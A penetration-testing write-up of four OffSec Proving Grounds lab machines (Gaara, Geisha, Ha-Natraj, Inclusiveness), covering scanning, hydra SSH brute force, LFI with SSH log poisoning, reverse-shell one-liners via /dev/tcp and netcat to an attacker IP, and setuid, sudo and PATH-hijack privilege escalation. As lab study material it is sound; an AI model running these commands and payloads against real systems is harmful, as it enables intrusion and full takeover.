OffSec PG - Gaara, Geisha, Ha-Natraj, Inclusiveness
Gaara
Enumeration
Machine IP → 192.168.208.142
Network Scan
Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.208.142
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.208.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
This did not reveal any useful information.
Exploitation
Using the image on the webpage as a reference, the username could be gaara. Therefore, used hydra to brute force the ssh server against the rockyou password list.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.208.142:22
This gives the password as iloveyou2 and subsequently gets the user flag.
Privilege Escalation
Checking for setuid binaries reveals the presence of gdb as a setuid to root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the gdb binary.
This is done as follows → gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit.
This grants the root shell and subsequently the root flag.
Geisha
Enumeration
Machine IP → 192.168.56.82
Network Scan
Nmap scan → nmap -sC -A -Pn -p- -o nmap.txt 192.168.56.82
OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
| 7080 | HTTPS | ssl/empowerid LiteSpeed |
| 7125 | HTTP | nginx 1.17.10 |
| 8088 | HTTP | LiteSpeed httpd |
| 9198 | HTTP | SimpleHTTPServer 0.6 (Python 2.7.16) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.56.82:<ports> -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
Directories/files listed →
Port 8088 →
- cgi-bin/ (404)
- docs/
- blocked/ (403)
Port 7125 →
- shadow (403)
- passwd
The passwd file lists user geisha.
Exploitation
With the username as geisha, a brute force was launched on the ssh server using hydra as follows → hydra -l geisha -P /home/tanq/installations/SecLists/rockyou.txt ssh://192.168.56.82.
This gives the password as letmein. After a successful login, the user flag can be obtained.
Privilege Escalation
Using the user shell, enumerated for setuid binaries as follows → find / -perm -u=s 2>/dev/null.
This resulted in an interesting find for the binary /usr/bin/base32. This could be used to read files with a privileged access, thereby allowing reads of files owned by root. Therefore, it was used to read the root flag as follows →
1
2
file=/root/proof.txt
/usr/bin/base32 "$file" | /usr/bin/base32 --decode
This can also be used to obtain root shell by using it to leak the ssh key of root and then using it to log in to the machine via ssh.
This gave the root flag.
Ha-Natraj
Enumeration
Machine IP → 192.168.51.80
Network Scan
Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.51.80
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
Table
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.29 (Ubuntu) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.51.80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
Directories/files listed →
- images/
- index.html
- console/
The console/ directory has a php file present in it called file.php.
Exploitation
LFI
Running the file.php file does not give any output. As a good practice checking for LFI using ?file=../../../../../etc/passwd works out and LFI is possible. There is an ssh service on the machine, therefore, checked log files. The auth log file at /var/log/auth.log contains the ssh logs.
Transition LFI to SSH Log Poisoning
Given the presence of SSH logs, poisoning is tested by using payload → ssh "<?php system(\$_GET['cmd']);?>"@<192.168.125.80>. A failed login attempt gets logged and the php code is inserted. LFI can now be used to execute the php in the log file, with the addition of the cmd parameter like so → ..console/file.php?file=/var/log/auth.log&cmd=id. This returned the id of the www-data user in the response i.e., RCE.
User shell
Using the RCE, a shell can be spawned by using bash payload → bash -i >& /dev/tcp/192.168.49.208/3002 0>&1 to get a reverse shell. This can be done via burp to URL encode and send the payload. There was no bash in the system, therefore reverting to nc and /bin/sh combo → rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.208 3002 >/tmp/f.
This gives a www-data user shell via netcat.
Privilege Escalation
Escalated User
With the www-data shell, the linenum script can be run (example → linenum script). This gives the files which are writable by the current user. One such file is the apache2.conf file which can be modified to ensure execution of the web server as a privileged user by editing the User and Group to be mahakal, a user detected by looking at the /etc/passwd file.
Next, a pentest monkey php reverse shell is plugged into the serving directory for navigation to it. This can be named exploit.php. The server needs to be restarted for the new settings to be applied. Therefore, as revealed using sudo -l, the server can be restarted as super user without the need of a password using the systemctl command as the www-data user.
After it is restarted, a listener can be used to receive shell as the user mahakal.
Root
As the user mahakal, the binary that can be run as as a super user without a password as revealed by sudo -l is actually nmap.
Nmap can be used to launch an interactive interpreter using →
1
2
3
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
Thus, the shell received is actually that of root. This gives the root flag.
Inclusiveness
Enumeration
Machine IP → 192.168.80.14
Network Scan
Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.80.14
OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 → Anonymous FTP allowed |
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.80.14 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
Directories/files listed →
- index.html
- robots.txt
- seo.html
- javascript/
- manual/
Looking at the robots.txt, it says only search engines are allowed to access it. Therefore, changing the User-Agent to GoogleBot in burp allows bypassing this restriction. This gives the directory /secret_information/.
Exploitation
LFI
The /secret_information/ directory consists of an introduction to DNS Zone transfer attacks and links to display it in English or Spanish. The links are of the form ..?lang=language.php. Therefore, attempting LFI here allows to print contents of the /etc/passwd file. This gives enumeration of the users → tom and root.
The anonymous ftp login shows that the pub directory of the FTP service is world writeable. Therefore, it is a good place for landing payloads. To get the exact path of the location, the configuration file must be read. From the service enumeration, the version is known to be vsftpd 3.0.3. The default config for this is at /etc/vsftpd.conf.
Using LFI to print this shows the following →
1
2
anon_root=/var/ftp/
write_enable=YES
Reverse shell from Anonymous write-enabled FTP and LFI
Using the FTP to upload a reverse shell in PHP and then using LFI to navigate to the payload using the path found in the config file grants the shell as user www-data. The payload used is pentest monkey’s PHP reverse shell.
Enumerating the setuid binaries, an interesting find was the presence of /home/tom/rootshell, which indicates getting privilege of user tom is the step required to get root on the machine.
Privilege Escalation
User
The home directory of the user tom is readable by www-data. Therefore, visiting it grants access to the code of the rootshell binary found above. This also gives the user flag.
The code of the rootshell binary uses FILE* f = popen("whoami", "r");. This does not use an exact path, therefore, the PATH variable can be abused to trick the program into evaluating the username as tom. Therefore, creating a new directory in /tmp and an executable whoami under it that prints tom allows adding this to the current PATH.
1
2
3
4
echo '#!/bin/bash' > whoami
echo 'echo tom' >> whoami
chmod +x whoami
export PATH=/tmp/testdirectory
This allows for execution of the rootshell binary, which evaluates all checks to true and grants the root shell, thereby the root flag.